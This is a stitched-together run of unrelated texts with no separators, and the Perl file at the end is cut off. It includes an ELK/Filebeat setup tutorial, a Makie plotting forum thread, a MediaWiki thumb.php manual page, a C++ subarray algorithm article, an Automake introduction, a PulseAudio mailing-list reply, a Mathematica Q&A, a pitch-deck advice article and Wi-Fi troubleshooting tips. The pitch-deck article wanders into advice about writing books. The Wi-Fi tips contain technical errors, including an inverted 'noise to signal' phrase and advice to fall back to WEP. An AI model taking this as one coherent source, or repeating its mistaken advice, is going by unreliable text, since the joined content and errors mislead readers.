Which Playwright browser(s) are you using?
What is the current behavior? Does the same browser (Chromium) open on a different display each time? Or do different browsers (Chromium vs Firefox vs Webkit) open on a different display?
I don't think Playwright has any options to control this behavior. I expect this to be browser or operating system behavior. On Mac OS, be sure to check/adjust what is your Main display. https://www.eizoglobal.com/support/compatibility/monitor/multimonitor/macos-monterey/
|
__label__pos
| 0.999842 |
I need a program that validates the value a user enters into a TextBox control to ensure that the entry is a valid telephone number.
The application should accept a maximum of 12 characters. When the user clicks a button, the program should determine if the entry is of the form 999-999-9999, where the character 9 represents any number.
If the entry is determined to be a telephone number, display an appropriate message, along with the separate substrings that compose the telephone number without the dashes. If the entry is not a telephone number, then display a message as to the reason why the entry is not a valid telephone number, clear the TextBox control and set focus to the TextBox control. Use String class methods to solve the problem.
haulottekAsked:
Mike TomlinsonMiddle School Assistant TeacherCommented:
Hmmm....we can't do your homework here on EE. We can help you with a specific problem in your code though.
So, get to work!
Cheers
0
haulottekAuthor Commented:
You are right I am working in it
0
dancebertCommented:
>So, get to work!
Or drop the class. Being either unable or unmotivated to do your programming homework should be a huge red flag that you don't have what it takes to build systems for a living.
pg_indiaCommented:
what u can do is to make a masked box with format as ###-###-####
set maxlength to 12 and then in key press check for the ascii value should be between 48 to 57..
also if error is there then u cnd do text1.text = ""
text1.setfocus
or whatever u want to do
if any problem do report...
0
haulottekAuthor Commented:
Lay off! I DO not need any help. Thanks
0
brother7Commented:
Tried and tested by me :)
Create a form with textbox txtInput and button cmdValidate.
--- CODE START ---
Private Sub cmdValidate_Click()
Dim areaCode, prefix, suffix As String
Dim isValid As Boolean
' assume a valid telephone number, try to invalidate it
isValid = True
' get the strings where numbers should be
areaCode = Left$(txtInput.Text, 3)
prefix = Mid$(txtInput.Text, 5, 3)
suffix = Right$(txtInput.Text, 4)
' check for valid length
If Len(txtInput.Text) <> 12 Then isValid = False
' check for numeric portions of telephone number
If Not IsNumeric(areaCode) Then isValid = False
If Not IsNumeric(prefix) Then isValid = False
If Not IsNumeric(suffix) Then isValid = False
' check that hyphens delimit the telephone number
If Mid$(txtInput.Text, 4, 1) <> "-" Or Mid$(txtInput.Text, 8, 1) <> "-" Then isValid = False
' tricky part... check that first and last characters of numeric parts aren't signs!
If Left$(areaCode, 1) = "+" Or Left$(areaCode, 1) = "-" Then isValid = False
If Right$(areaCode, 1) = "+" Or Right$(areaCode, 1) = "-" Then isValid = False
If Left$(prefix, 1) = "+" Or Left$(prefix, 1) = "-" Then isValid = False
If Right$(prefix, 1) = "+" Or Right$(prefix, 1) = "-" Then isValid = False
If Left$(suffix, 1) = "+" Or Left$(suffix, 1) = "-" Then isValid = False
If Right$(suffix, 1) = "+" Or Right$(suffix, 1) = "-" Then isValid = False
If isValid Then
returnValue = MsgBox("This is a valid telephone number." & vbCrLf & vbCrLf & _
"Area Code = " & areaCode & vbCrLf & _
"Prefix = " & prefix & vbCrLf & _
"Suffix = " & suffix, vbOKOnly, "Validation Result")
Else
returnValue = MsgBox("This is NOT a valid telephone number.", vbOKOnly, "Validation Result")
End If
End Sub
--- CODE END ---
0
brother7Commented:
New and improved version!
I forgot to give explanation why telephone number is invalid. This version also correctly clears the textbox and sets the focus.
--- CODE START ---
Private Sub cmdValidate_Click()
Dim areaCode, prefix, suffix, errorMsg As String
Dim isValid As Boolean
' assume a valid telephone number, try to invalidate it
isValid = True
' get the strings where numbers should be
areaCode = Left$(txtInput.Text, 3)
prefix = Mid$(txtInput.Text, 5, 3)
suffix = Right$(txtInput.Text, 4)
' check for numeric portions of telephone number
If Not IsNumeric(areaCode) Then
isValid = False
errorMsg = "Area Code " & areaCode & " is not numeric."
End If
If Not IsNumeric(prefix) Then
isValid = False
errorMsg = "Prefix " & prefix & " is not numeric."
End If
If Not IsNumeric(suffix) Then
isValid = False
errorMsg = "Suffix " & suffix & " is not numeric."
End If
' tricky part... check that first and last characters of numeric parts aren't signs!
If Left$(areaCode, 1) = "+" Or Left$(areaCode, 1) = "-" Or _
Right$(areaCode, 1) = "+" Or Right$(areaCode, 1) = "-" Or _
Left$(prefix, 1) = "+" Or Left$(prefix, 1) = "-" Or _
Right$(prefix, 1) = "+" Or Right$(prefix, 1) = "-" Or _
Left$(suffix, 1) = "+" Or Left$(suffix, 1) = "-" Or _
Right$(suffix, 1) = "+" Or Right$(suffix, 1) = "-" Then
isValid = False
errorMsg = "Why are you trying to trick me?" & vbCrLf & _
"A + or - sign is hidden in the telephone number."
End If
' check that hyphens delimit the telephone number
If Mid$(txtInput.Text, 4, 1) <> "-" Or Mid$(txtInput.Text, 8, 1) <> "-" Then
isValid = False
errorMsg = "Hyphen delimiters are missing or misplaced."
End If
' check for valid length
If Len(txtInput.Text) <> 12 Then
isValid = False
errorMsg = "Input string is incorrect length (" & Len(txtInput.Text) & ")"
End If
' display message box
If isValid Then
returnValue = MsgBox("This is a valid telephone number." & vbCrLf & vbCrLf & _
"Area Code = " & areaCode & vbCrLf & _
"Prefix = " & prefix & vbCrLf & _
"Suffix = " & suffix, vbOKOnly, "Validation Result")
Else
returnValue = MsgBox("This is NOT a valid telephone number." & vbCrLf & vbCrLf & _
errorMsg, vbOKOnly, "Validation Result")
End If
txtInput.Text = ""
txtInput.SetFocus
End Sub
--- CODE END ---
0
pg_indiaCommented:
But i feel my way is simpler and it saves from lot of coding...
comments plzzzz
add a component : masked textbox
AND THIS CODE...
Private Sub Command6_KeyPress(KeyAscii As Integer)
If KeyAscii < 48 Or KeyAscii > 57 Then
KeyAscii = 0
End If
End Sub
0
brother7Commented:
In the problem statement, it says "Use String class methods to solve the problem." I'm thinking that his teacher wants him to get familiar with Left$, Mid$ and Right$.
0
PashaModCommented:
PAQed - no points refunded (of 250)
PashaMod
Community Support Moderator
0
|
__label__pos
| 0.875697 |
Monthly Archives
March 2019
What is a Malware and Virus?
Regardless of what you call it, most people know you don’t want a malware or a virus hanging around. Then why is it important to understand the difference between the two? One simple reason is you can protect your computer from a virus, but not be protected from a malware. Why? Because all viruses are malwares, but not all malwares are viruses. Allow me to explain.
What is a Malware
Malware, short for malicious software, is written by cyber criminals with the intention of gaining access to or causing damage to a computer or network, often without you even knowing you've been compromised. This malicious software is written differently depending on the goal(s) of the perpetrator. For example, a malware appropriately named ransomware is written in a way that once your computer or network is infected you are locked out and unable to access your data until you pay a ransom. Another example is those annoying pop-ups that almost force you to click on an advertisement link; these come from a malware called adware. There are many other variations of malware, including trojan horses, spyware, wipers, worms, botnets, keyloggers, rootkits, and fraudtools, each written with different objectives.
What is a Virus
One of the most recognized names of all malwares is the virus made popular in the 80’s and 90’s. This malware is written with the intention of altering the way your computer operates and spreads itself across a network without the user’s involvement. Over the past few decades the virus has become less frequent compared to other malwares, but its name continues to be used synonymously with malwares. “My computer has a virus” often means your computer has a malware.
How to protect yourself
There are best practices such as security awareness training to avoid phishing, a “is this software safe?” search before downloading a program or app, keeping your software up to date, using strong passwords, backing up your computer, and using a firewall. One of the most reliable ways to protect your data is through the use of anti-malware and anti-virus software. Anti-virus software is about preventing viruses from being downloaded or opened on your computer or network. If a virus becomes active it’s difficult for the anti-virus software to detect its presence. Anti-malware on the other hand is designed to take malware, including a virus, out of an infected computer. Think of it as anti-virus is about prevention while anti-malware is about correction. That said, it is advised to use both for the best protection. If you are interested in learning more about the software available, check out PC Magazine’s “The Best Malware Removal and Protection Software for 2019” at https://www.pcmag.com/roundup/354226/the-best-malware-removal-and-protection-tools
While speaking with a friend Jason about malware vs. virus, he made a comparison to spiders. This helped me make the “all viruses are malwares, but not all malwares are viruses” statement easier to understand. Think of this, all Daddy Long Legs are spiders, but not all spiders are Daddy Long Legs.
Next up: What is a firewall?
Click here for our previous post, “What is XaaS?”
What is XaaS?
What is XaaS?
You can replace the X with just about any letter of the alphabet and you will likely find it is a service. I randomly picked the letter T which, as it turns out, is “testing”, who knew? The X can also represent services with more than one letter, such as: disaster recovery (DRaaS), business continuity (BCaaS), information technology (ITaaS), database (DBaaS), etc.
Perhaps the most popular “aaS” is SaaS, pronounced “sas” not S-A-A-S. Although the S can represent many services including search, security, and storage, it is more commonly recognized as Software-as-a-Service.This particular service has been made popular thanks to recognizable household services like Dropbox, LinkedIn, and Twitter and although debated Facebook. In business you hear names like: DocuSign, LinkedIn, Salesforce, Office 365, Zendesk, GoToMeeting, Workday, HubSpot & Intuit (QuickBooks, TurboTax, etc.) Beyond SaaS, some of the other common “aaS” include backup (BaaS), desktop (DaaS), infrastructure (IaaS), platform (PaaS), and unified communications (UCaaS).
The benefits of “aaS” are many including lower cost, speed of deployment, seamless upgrades, no infrastructure required and its accessibility from multiple devices (tablets, laptops, smartphones, etc.).
Next up: What is a malware and virus?
Click here for our previous post, “What is Mobile Device Management?”
|
__label__pos
| 0.647686 |
Form preview
Django comes with an optional “form preview” application that helps automate the following workflow:
“Display an HTML form, force a preview, then do something with the submission.”
To force a preview of a form submission, all you have to do is write a short Python class.
Overview
Given a django.forms.Form subclass that you define, this application takes care of the following workflow:
1. Displays the form as HTML on a Web page.
2. Validates the form data when it's submitted via POST.
   a. If it's valid, displays a preview page.
   b. If it's not valid, redisplays the form with error messages.
3. When the “confirmation” form is submitted from the preview page, calls a hook that you define – a done() method that gets passed the valid data.
The framework enforces the required preview by passing a shared-secret hash to the preview page via hidden form fields. If somebody tweaks the form parameters on the preview page, the form submission will fail the hash-comparison test.
How to use FormPreview
1. Point Django at the default FormPreview templates. There are two ways to do this:
• Add 'django.contrib.formtools' to your INSTALLED_APPS setting. This will work if your TEMPLATE_LOADERS setting includes the app_directories template loader (which is the case by default). See the template loader docs for more.
• Otherwise, determine the full filesystem path to the django/contrib/formtools/templates directory, and add that directory to your TEMPLATE_DIRS setting.
2. Create a FormPreview subclass that overrides the done() method:
from django.contrib.formtools.preview import FormPreview
from django.http import HttpResponseRedirect
from myapp.models import SomeModel

class SomeModelFormPreview(FormPreview):

    def done(self, request, cleaned_data):
        # Do something with the cleaned_data, then redirect
        # to a "success" page.
        return HttpResponseRedirect('/form/success')
This method takes an HttpRequest object and a dictionary of the form data after it has been validated and cleaned. It should return an HttpResponseRedirect that is the end result of the form being submitted.
3. Change your URLconf to point to an instance of your FormPreview subclass:
from myapp.preview import SomeModelFormPreview
from myapp.forms import SomeModelForm
from django import forms
...and add the following line to the appropriate pattern in your URLconf:
(r'^post/$', SomeModelFormPreview(SomeModelForm)),
where SomeModelForm is a Form or ModelForm class for the model.
4. Run the Django server and visit /post/ in your browser.
FormPreview classes
class FormPreview
A FormPreview class is a simple Python class that represents the preview workflow. FormPreview classes must subclass django.contrib.formtools.preview.FormPreview and override the done() method. They can live anywhere in your codebase.
FormPreview templates
FormPreview.form_template
FormPreview.preview_template
By default, the form is rendered via the template formtools/form.html, and the preview page is rendered via the template formtools/preview.html. These values can be overridden for a particular form preview by setting preview_template and form_template attributes on the FormPreview subclass. See django/contrib/formtools/templates for the default templates.
Advanced FormPreview methods
FormPreview.process_preview()
Given a validated form, performs any extra processing before displaying the preview page, and saves any extra data in context.
By default, this method is empty. It is called after the form is validated, but before the context is modified with hash information and rendered.
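As an illustrative sketch only (the 'note' field is a hypothetical form field; check the formtools source for the exact signature in your Django version), an override could look like:
def process_preview(self, request, form, context):
    # stash extra data in the template context for the preview page
    context['note_length'] = len(form.cleaned_data.get('note', ''))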
|
__label__pos
| 0.756429 |
PHP Object-Oriented Programming: 12. Overriding Parent Methods (parent::) - Cooper's Tech Sharing
Author: Zhang Xiaoshi  Date: 2015-07-30  Reads: 540
As you learn PHP you will notice that methods cannot be overloaded. Method overloading means defining several methods with the same name and selecting between them by the number or the types of their parameters. Because PHP is a weakly typed language, a method's parameters can already receive data of different types, and because PHP methods can accept a variable number of arguments, calling different same-named methods by passing a different number of parameters does not work either. So there is no method overloading in PHP, which also means you cannot define two methods with the same name in your project. In addition, since PHP (at the time) had no namespaces, you cannot define functions with the same name in one page or in included pages, you cannot define a function with the same name as a built-in PHP function, and of course you cannot define two methods with the same name inside one class.
So what do we mean here by "overriding" a method? What we mean is a subclass overriding an existing method of its parent class. Why would we do that - aren't the parent's methods inherited and usable directly? In some cases we have to override them. For example, in the earlier example the "Person" class has a "say" method, so every subclass of "Person" can speak. Our "Student" class is a subclass of "Person", so a "Student" instance can speak too. But the "say" method of the Person class only speaks the properties defined in "Person", while the "Student" class extends "Person" with a few new properties. If we use the inherited "say()" method, it can only speak the properties inherited from "Person"; the newly added properties cannot be spoken with it. You might ask: can't I just define a new speaking method in the "Student" subclass that says all of its properties? Do not do that. From an abstraction point of view, a "student" cannot have two ways of "speaking". Even if you defined two different speaking methods to get the behaviour you want, the inherited "say()" method would probably never be used again, and since it is inherited you cannot delete it. This is where overriding comes in.
Although you cannot define two methods with the same name in PHP, in two classes with a parent-child relationship we can define a method in the subclass with the same name as one in the parent class, which overrides the method inherited from the parent.
<?php
// Define a "Person" class as the parent class
class Person
{
    // Member properties of a person
    var $name; // the person's name
    var $sex;  // the person's sex
    var $age;  // the person's age

    // Constructor: assigns the name ($name), sex ($sex) and age ($age) properties
    function __construct($name, $sex, $age) {
        $this->name = $name;
        $this->sex = $sex;
        $this->age = $age;
    }

    // The person's speaking method: it says out the person's own properties
    function say() {
        echo "My name is: " . $this->name . " Sex: " . $this->sex . " My age is: " . $this->age;
    }
}

class Student extends Person
{
    var $school; // the school the student attends

    // The student's studying method
    function study() {
        echo "My name is: " . $this->name . " I am studying at " . $this->school;
    }

    // The student's speaking method: says all of its properties, overriding the parent's method of the same name
    function say() {
        echo "My name is: " . $this->name . " Sex: " . $this->sex . " My age is: " . $this->age . " I study at " . $this->school;
    }
}
?>
In the example above, we overrode the inherited "say()" method in the "Student" subclass, and through overriding we extended the method. Although this solves the problem described above, in real development a method rarely consists of just one or a few lines of code. Suppose the "say()" method in the "Person" class contained 100 lines of code; to override it while keeping the original behaviour plus a small addition, we would have to rewrite those 100 lines and then add the few extra lines. And that is the lucky case - sometimes the source code of the parent method is not even visible, so how could you rewrite it? There is a solution: inside the subclass method we can call the parent's overridden method, that is, reuse the overridden method's original functionality and then add a little of our own. Calling the parent's overridden method from the subclass can be done in two ways:
One is to use the parent class name with the scope-resolution operator ("ClassName::") to call the overridden method in the parent class;
The other is to use "parent::" to call the overridden method in the parent class.
class Student extends Person
{
    var $school; // the school the student attends

    // The student's studying method
    function study() {
        echo "My name is: " . $this->name . " I am studying at " . $this->school;
    }

    // The student's speaking method: says all of its properties, overriding the parent's method of the same name
    function say() {
        // use the parent class name with "::" to call the overridden method;
        // Person::say();
        // or use "parent::" to call the overridden method;
        parent::say();
        // add a little extra functionality
        echo " My age is: " . $this->age . " I study at " . $this->school;
    }
}
Both ways give us access to the overridden method in the parent class, so which one should we choose? You may find that your code refers to the parent class's variables and functions; this happens especially when the subclass is very lean or the parent class is very specialised. Do not use the parent class's literal name in the code; use the special name parent instead, which refers to the name of the parent class given in the subclass's extends declaration. Doing so avoids repeating the parent class's name in several places: if the inheritance tree has to change during implementation, you only need to modify the extends declaration of the class.
Likewise, if no constructor is declared in the subclass, the constructor of the parent class is used. If the subclass defines a new constructor, it overrides the parent's constructor as well; if you want the new constructor to assign values to all properties, you can use the same approach.
class Student extends Person
{
    var $school; // the school the student attends

    function __construct($name, $sex, $age, $school) {
        // use the parent's constructor to assign the inherited properties
        parent::__construct($name, $sex, $age);
        $this->school = $school;
    }

    // The student's studying method
    function study() {
        echo "My name is: " . $this->name . " I am studying at " . $this->school;
    }

    // The student's speaking method
    function say() {
        parent::say();
        // add a little extra functionality
        echo " My age is: " . $this->age . " I study at " . $this->school;
    }
}
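A quick usage sketch (not part of the original article; the values are made up) to see the overridden method in action:
$student = new Student("Zhang San", "male", 20, "Peking University");
$student->say(); // Student::say() runs, which first calls parent::say() and then adds the age and school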
|
__label__pos
| 0.776478 |
MYTUTOR SUBJECT ANSWERS
558 views
Simple binomial: (1+0.5x)^4
Expand (1+0.5x)^4, simplifying the coefficients.
1. Draw Pascal's triangle to find the coefficients
1
1 1
1 2 1
1 3 3 1
1 4 6 4 1
As you can see, each row starts and ends with 1. The numbers in between are worked out by adding the two numbers on top.
For this question, we will be using the 1 4 6 4 1 row because the expression is raised to the power of 4. This expansion will have 5 terms.
2. For each term, both 1 and 0.5 are raised to powers from 0 to 4, where the sum of the two powers always adds up to 4. In addition, the power of x increases from 0 to 4 as the terms progress (it always matches the power of 0.5).
(1+0.5x)^4
= 1(1)^4(0.5)^0 x^0 + 4(1)^3(0.5)^1 x^1 + 6(1)^2(0.5)^2 x^2 + 4(1)^1(0.5)^3 x^3 + 1(1)^0(0.5)^4 x^4
First, 1 is raised to the power of 4, so 0.5 is raised to the power of 0. For the next term, the power of 1 decreases by 1 and the power of 0.5 increases by 1, so that the sum of the powers still equals 4. This is done until we get 5 terms in total.
3. The expression can be simplified as follows:
= 1 + 4(1/2)x + 6(1/4)x^2 + 4(1/8)x^3 + (1/16)x^4
= 1 + 2x + (3/2)x^2 + (1/2)x^3 + (1/16)x^4
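As a quick check (not part of the original answer): substituting x = 0.1 gives (1 + 0.05)^4 = 1.21550625, while the expansion gives 1 + 0.2 + 0.015 + 0.0005 + 0.00000625 = 1.21550625, which agrees exactly, as it must, since expanding a fourth power into five terms is exact.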
Answered by Srikka, an A Level Maths tutor with MyTutor
|
__label__pos
| 0.679919 |
Tutorial: Installing Centralized Server Log Management Using Elasticsearch, Logstash and Kibana on CentOS 7
Rahman Arif, 6 November 2017
Elasticsearch is an open source search engine under the Apache License, written in the Java programming language. It provides a distributed, multitenant full-text search engine with an HTTP dashboard web interface (Kibana). Data is stored, retrieved and displayed in JSON format. Elasticsearch is a scalable search engine that can be used to search all kinds of text documents, including log files. Elasticsearch is the heart of the 'Elastic Stack', or ELK Stack.
Logstash is an open source tool for managing events and logs. It provides real-time pipelining for data collection. In this tutorial, Logstash will collect the server log data, transform the data into JSON documents, and store them in Elasticsearch.
Kibana is an open source data visualisation tool for Elasticsearch. It provides a beautiful dashboard web interface that we can use to manage and visualise data from Elasticsearch. Kibana is not only pretty, it is also powerful.
In this tutorial, we will install and configure the Elastic Stack on a CentOS 7 server to monitor server logs. Then we will install 'Filebeat' on CentOS 7 and Ubuntu 16 client operating systems.
In this tutorial, we will work through the following steps:
Step 1 - Configure the ELK Server
Step 2 - Install Java
Step 3 - Install and Configure Elasticsearch
Step 4 - Install and Configure Kibana with Nginx
Step 5 - Install and Configure Logstash
Step 6 - Install and Configure Filebeat on the CentOS Client
Step 7 - Install and Configure Filebeat on the Ubuntu Client
Step 8 - Testing
References
Prerequisites
1. CentOS 7 64-bit with 4 GB RAM - server.logging.com (192.168.1.97)
2. CentOS 7 64-bit with 1 GB RAM - centos7.logging.com (192.168.1.98)
3. Ubuntu 16 64-bit with 1 GB RAM - ubuntu1604.logging.com (192.168.1.99)
Step 1 - Configure the ELK Server
In this tutorial, we will disable SELinux on CentOS 7 by editing the SELinux configuration file. Log in to the server with the root account, then type:
$ vim /etc/sysconfig/selinux
Change the SELINUX value from enforcing to disabled.
SELINUX=disabled
Save and close Vim.
<press the Esc key>
:wq
Then restart the server.
$ reboot
Log in to the server again and check the SELinux status by typing:
$ getenforce
Make sure the result is disabled.
Also stop and disable the firewall, since we do not need it in this tutorial.
$ systemctl stop firewalld
$ systemctl disable firewalld
Step 2 - Install Java
Java is required to install the Elastic Stack. Elasticsearch requires Java 8; it is recommended to use Oracle JDK 1.8. We will install Java 8 from the official Oracle rpm package.
Download the Java 8 JDK with the wget command.
$ wget --no-cookies --no-check-certificate --header "Cookie: gpw_e24=http:%2F%2Fwww.oracle.com%2F; oraclelicense=accept-securebackup-cookie" "http://download.oracle.com/otn-pub/java/jdk/8u144-b01/090f390dda5b47b9b721c7dfaa008135/jdk-8u144-linux-x64.rpm"
Then install it with the rpm command.
$ rpm -ivh jdk-8u144-linux-x64.rpm
Next, check the Java JDK version to make sure the installation worked as expected.
$ java -version
You will see the Java version in the server terminal.
Step 3 - Install and Configure Elasticsearch
In this step, we will install and configure Elasticsearch. We will install Elasticsearch from the rpm package provided by elastic.co and configure it to run on localhost (to keep the setup secure and make sure it is not reachable from the outside).
Before installing Elasticsearch, add the elastic.co key to the server.
$ rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch
Next, download Elasticsearch 5.1 with wget and then install it.
$ wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.1.1.rpm
$ rpm -ivh elasticsearch-5.1.1.rpm
After Elasticsearch is installed, go to the configuration directory and edit the elasticsearch.yml configuration file.
$ cd /etc/elasticsearch/
$ vim elasticsearch.yml
Enable the memory lock by uncommenting line 40. This disables memory swapping for Elasticsearch.
bootstrap.memory_lock: true
In the Network block, uncomment the network.host and http.port lines.
network.host: localhost
http.port: 9200
Save the file and exit the editor.
Now edit the elasticsearch.service file for the memory lock configuration.
vim /usr/lib/systemd/system/elasticsearch.service
Uncomment the LimitMEMLOCK line.
LimitMEMLOCK=infinity
Save the file and exit the editor.
Edit the sysconfig configuration file for Elasticsearch.
vim /etc/sysconfig/elasticsearch
Uncomment line 60 and make sure the value is unlimited.
MAX_LOCKED_MEMORY=unlimited
Save the file and exit the editor.
The Elasticsearch configuration is finished. Elasticsearch will run on the localhost IP address on port 9200, and memory swapping is disabled by enabling mlockall on the CentOS server.
Reload systemd, enable Elasticsearch to start at boot, then start the service.
sudo systemctl daemon-reload
sudo systemctl enable elasticsearch
sudo systemctl start elasticsearch
Wait a moment for Elasticsearch to start, then check the open ports on the server and make sure the 'state' for port 9200 is LISTEN.
Check this by typing the command netstat -plntu
Then check the memory lock to make sure mlockall is enabled, and check whether Elasticsearch is running, with the commands below.
curl -XGET 'localhost:9200/_nodes?filter_path=**.mlockall&pretty'
curl -XGET 'localhost:9200/?pretty'
You should see the mlockall status and the Elasticsearch version information in the output.
Step 4 - Install and Configure Kibana with Nginx
In this step, we will install and configure Kibana behind the Nginx web server. Kibana will listen on the localhost IP address, and Nginx acts as a reverse proxy for the Kibana application.
Download Kibana 5.1 with wget, then install it with rpm:
wget https://artifacts.elastic.co/downloads/kibana/kibana-5.1.1-x86_64.rpm
rpm -ivh kibana-5.1.1-x86_64.rpm
Now edit the Kibana configuration file.
vim /etc/kibana/kibana.yml
Uncomment the configuration lines for server.port, server.host and elasticsearch.url.
server.port: 5601
server.host: "localhost"
elasticsearch.url: "http://localhost:9200"
Save the file and exit the editor.
Enable Kibana to run at boot and start the service.
sudo systemctl enable kibana
sudo systemctl start kibana
Kibana will run on port 5601 as a node application.
netstat -plntu
The Kibana installation is finished. Now we need to install Nginx and configure it as a reverse proxy so that Kibana can be reached from the public IP address.
Nginx is available in the EPEL repository; install epel-release with yum.
yum -y install epel-release
Next, install the Nginx and httpd-tools packages.
yum -y install nginx httpd-tools
The httpd-tools package contains tools for the web server; we will use htpasswd basic authentication for Kibana.
Edit the Nginx configuration file and remove or comment out the 'server {}' block, so we can add a new virtual host configuration.
cd /etc/nginx/
vim nginx.conf
Comment out the server {} block. Save the file and exit the editor.
Now we need to create a new virtual host configuration file in the conf.d directory. Create a new file 'kibana.conf' with vim, vi or nano.
vim /etc/nginx/conf.d/kibana.conf
Paste the configuration below.
server {
listen 80;
server_name 192.168.1.97;
auth_basic "Restricted Access";
auth_basic_user_file /etc/nginx/.kibana-user;
location / {
proxy_pass http://localhost:5601;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}
Save the file and exit the editor.
Then create a new basic authentication file with the htpasswd command.
sudo htpasswd -c /etc/nginx/.kibana-user admin
TYPE YOUR PASSWORD
Test the Nginx configuration and make sure there are no errors. Then enable Nginx to run at boot and start Nginx.
nginx -t
systemctl enable nginx
systemctl start nginx
Nginx will run on port 80 as the nginx: master process.
netstat -plntu
Step 5 - Install and Configure Logstash
In this step, we will install Logstash and configure it to centralise server logs from the clients with filebeat, then filter and transform the Syslog data and move it into the store (Elasticsearch).
Download Logstash and install it with rpm.
wget https://artifacts.elastic.co/downloads/logstash/logstash-5.1.1.rpm
rpm -ivh logstash-5.1.1.rpm
Create a new SSL certificate file so that the clients can identify the elastic server. Go to the tls directory and edit the openssl.cnf file.
cd /etc/pki/tls
vim openssl.cnf
Add a new line in the '[ v3_ca ]' section for the server identification.
[ v3_ca ]
# Server IP Address
subjectAltName = IP: 192.168.1.97
Simpan file dan keluar dari editor.
Buat file sertifikat dengan perintah openssl.
openssl req -config /etc/pki/tls/openssl.cnf -x509 -days 3650 -batch -nodes -newkey rsa:2048 -keyout /etc/pki/tls/private/logstash-forwarder.key -out /etc/pki/tls/certs/logstash-forwarder.crt
The certificate files can be found in the /etc/pki/tls/certs/ and /etc/pki/tls/private/ directories. Next, we will create new configuration files for Logstash: a filebeat-input.conf file to configure the log source for filebeat, a syslog-filter.conf file for syslog processing, and an output-elasticsearch.conf file to define the Elasticsearch output.
Go to the logstash configuration directory and create the new configuration files in the conf.d subdirectory.
cd /etc/logstash/
vim conf.d/filebeat-input.conf
Input configuration: paste the configuration below.
input {
beats {
port => 5443
ssl => true
ssl_certificate => "/etc/pki/tls/certs/logstash-forwarder.crt"
ssl_key => "/etc/pki/tls/private/logstash-forwarder.key"
}
}
Save the file and exit the editor.
Create the syslog-filter.conf file.
vim conf.d/syslog-filter.conf
Paste the configuration below.
filter {
if [type] == "syslog" {
grok {
match => { "message" => "%{SYSLOGTIMESTAMP:syslog_timestamp} %{SYSLOGHOST:syslog_hostname} %{DATA:syslog_program}(?:\[%{POSINT:syslog_pid}\])?: %{GREEDYDATA:syslog_message}" }
add_field => [ "received_at", "%{@timestamp}" ]
add_field => [ "received_from", "%{host}" ]
}
date {
match => [ "syslog_timestamp", "MMM d HH:mm:ss", "MMM dd HH:mm:ss" ]
}
}
}
We use the filter plugin named 'grok' to parse the syslog lines. Save the file and exit the editor.
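For example, an illustrative log line such as the following (not taken from a real server):
Feb 1 22:14:15 elk-client1 sshd[2215]: Accepted password for root from 192.168.1.10
would be split by this grok pattern into fields roughly like:
syslog_timestamp: Feb 1 22:14:15
syslog_hostname: elk-client1
syslog_program: sshd
syslog_pid: 2215
syslog_message: Accepted password for root from 192.168.1.10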
Create the output configuration file output-elasticsearch.conf.
vim conf.d/output-elasticsearch.conf
Paste the configuration below.
output {
elasticsearch {
hosts => ["localhost:9200"]
manage_template => false
index => "%{[@metadata][beat]}-%{+YYYY.MM.dd}"
document_type => "%{[@metadata][type]}"
}
}
Save the file and exit the editor.
Next, enable logstash to start at boot and start the service.
sudo systemctl enable logstash
sudo systemctl start logstash
Logstash is now listening on port 5443.
netstat -plntu
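If logstash fails to start or the port does not show up, you can first test the pipeline configuration files; the path and flag below assume a standard rpm installation of Logstash 5.x:
/usr/share/logstash/bin/logstash --path.settings /etc/logstash --config.test_and_exit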
Copy logstash-forwarder.crt from /etc/pki/tls/certs/logstash-forwarder.crt to /root/logstash-forwarder.crt.
cp -v /etc/pki/tls/certs/logstash-forwarder.crt /root/logstash-forwarder.crt
Step 6 - Install and Configure Filebeat on the CentOS Client
Beats are data shippers, lightweight agents that can be installed on client nodes to send large amounts of data from the client machine to the Logstash or Elasticsearch server. There are 4 beats available: 'Filebeat' for 'Log Files', 'Metricbeat' for 'Metrics', 'Packetbeat' for 'Network Data' and 'Winlogbeat' for the Windows client 'Event Log'.
We will install and configure 'Filebeat' to transfer log file data to the Logstash server over an SSL connection.
Specifically for CentOS 7, we would have to open some ports if we were using the firewalld service; in this case, however, we will simply stop the firewall and disable SELinux with the following commands:
systemctl stop firewalld
systemctl disable firewalld
Disable SELinux:
vim /etc/sysconfig/selinux
Change the SELINUX value from enforcing to disabled.
SELINUX=disabled
Then reboot the server.
reboot
Log in to the server again and check the SELinux status.
getenforce
Make sure the result is disabled.
Log in to the client1 server. Then copy the certificate file from the elastic server to the client1 server.
ssh root@client1IP
Copy the certificate file with the scp command.
scp [email protected]:~/logstash-forwarder.crt .
TYPE the server.logging.com root password
Create a new directory and move the certificate file into it.
sudo mkdir -p /etc/pki/tls/certs/
mv ~/logstash-forwarder.crt /etc/pki/tls/certs/
Next, import the elastic key on the client1 server.
rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch
Download Filebeat and install it with rpm.
wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-5.1.1-x86_64.rpm
rpm -ivh filebeat-5.1.1-x86_64.rpm
Filebeat has been installed; go to the configuration directory and edit the filebeat.yml file.
cd /etc/filebeat/
vim filebeat.yml
Around line 21, add the new log files. We will add two files: /var/log/secure for ssh activity and /var/log/messages for the server log.
paths:
- /var/log/secure
- /var/log/messages
Add a new configuration on line 26 to define the syslog document type.
document_type: syslog
Filebeat uses Elasticsearch as the output target by default. In this tutorial, we change it to Logstash. Disable the Elasticsearch output by commenting out lines 83 and 85.
#-------------------------- Elasticsearch output ------------------------------
#output.elasticsearch:
# Array of hosts to connect to.
# hosts: ["localhost:9200"]
Now add the new logstash output configuration. Uncomment the logstash output configuration and change all values to the configuration shown below.
output.logstash:
# The Logstash hosts
hosts: ["192.168.1.97:5443"]
bulk_max_size: 1024
ssl.certificate_authorities: ["/etc/pki/tls/certs/logstash-forwarder.crt"]
template.name: "filebeat"
template.path: "filebeat.template.json"
template.overwrite: false
Save the file and exit the editor.
Enable Filebeat to start at boot and start the service.
sudo systemctl enable filebeat
sudo systemctl start filebeat
Step 7 - Install and Configure Filebeat on the Ubuntu Client
Connect to the server with ssh.
ssh root@ubuntu-clientIP
Copy the certificate file to the client with the scp command.
scp [email protected]:~/logstash-forwarder.crt .
Create a new directory for the certificate file and move the file into it.
sudo mkdir -p /etc/pki/tls/certs/
mv ~/logstash-forwarder.crt /etc/pki/tls/certs/
Add the elastic key to the server.
